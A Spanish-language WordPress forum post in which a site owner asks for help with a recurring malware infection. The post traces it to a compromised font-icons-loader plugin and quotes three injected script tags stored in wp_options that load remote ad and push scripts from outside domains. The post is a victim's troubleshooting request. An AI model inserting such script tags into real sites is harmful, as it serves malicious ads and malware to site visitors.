Malware detectado (y Ads)
-
Buenas!!
Parece que un sitio web que administro, desde hace tiempo, tiene problemas de malware. Con algunos ordeandores/navegadores lo detecta, con otros no. En algunos simplemente sale publicidad. En otros, el antivirus (Eset) detecta malware srcinject.b
Cuando lo paso por un scanner web, me dice que encuentra este código:<script type=»text/javascript» src=»//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=»false»></script>
Me he bajado todos los ficheros por FTP y los he escaneado, y nada.
Luego he pensado que podría estar en la base de datos. He hecho un export completo, y efectivamente me encuentro en la WP_OPTIONS, que aparece esta linea:
ID 39597, AD_CODE,
<script type=»text/javascript» src=»//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=»false»></script>
<script src=»https://pushsar.com/pfe/current/tag.min.js?z=3260077″ data-cfasync=»false» async></script>
<script type=»text/javascript» src=»//inpagepush.com/400/3324386″ data-cfasync=»false» async=»async»></script>Borro el contenido del option_value, lo recargo y sigue vacio, pern en cuanto vuelvo a navegar por la web, reaparece ese contenido de nuevo en WP_OPTIONS…
Por otro lado, cuando instalé el plugin font-icons-loader, el antivirus del servidor me detectó malware en ese plugin, en el fichero wp-font-icons-loader.php, pero yo nunca vi dentro de ese fichero nada malicioso. En cambio, ahora me meto a verlo, y en otro fichero que hay justo junto a ese, el class.plugin-modules.php, si que veo que está plagadito de malware y generadores de ads. Lo renombro a php2, y nada, que se sigue regenerando la opcion de WP_OPTIONS…
Ya no sé me ocurre que hacer, alguien alguna idea? No puedo eliminar ese plugin, es necesario para mostrar los iconos que hay dentro de los bloques de WP_Bakery (VC) en los que se basa la mayoría de la web. He buscado fuentes alternativas de ese plugin, y sin exito…
Muchas gracias
La página con la que necesito ayuda: [accede para ver el enlace]
- El debate ‘Malware detectado (y Ads)’ está cerrado a nuevas respuestas.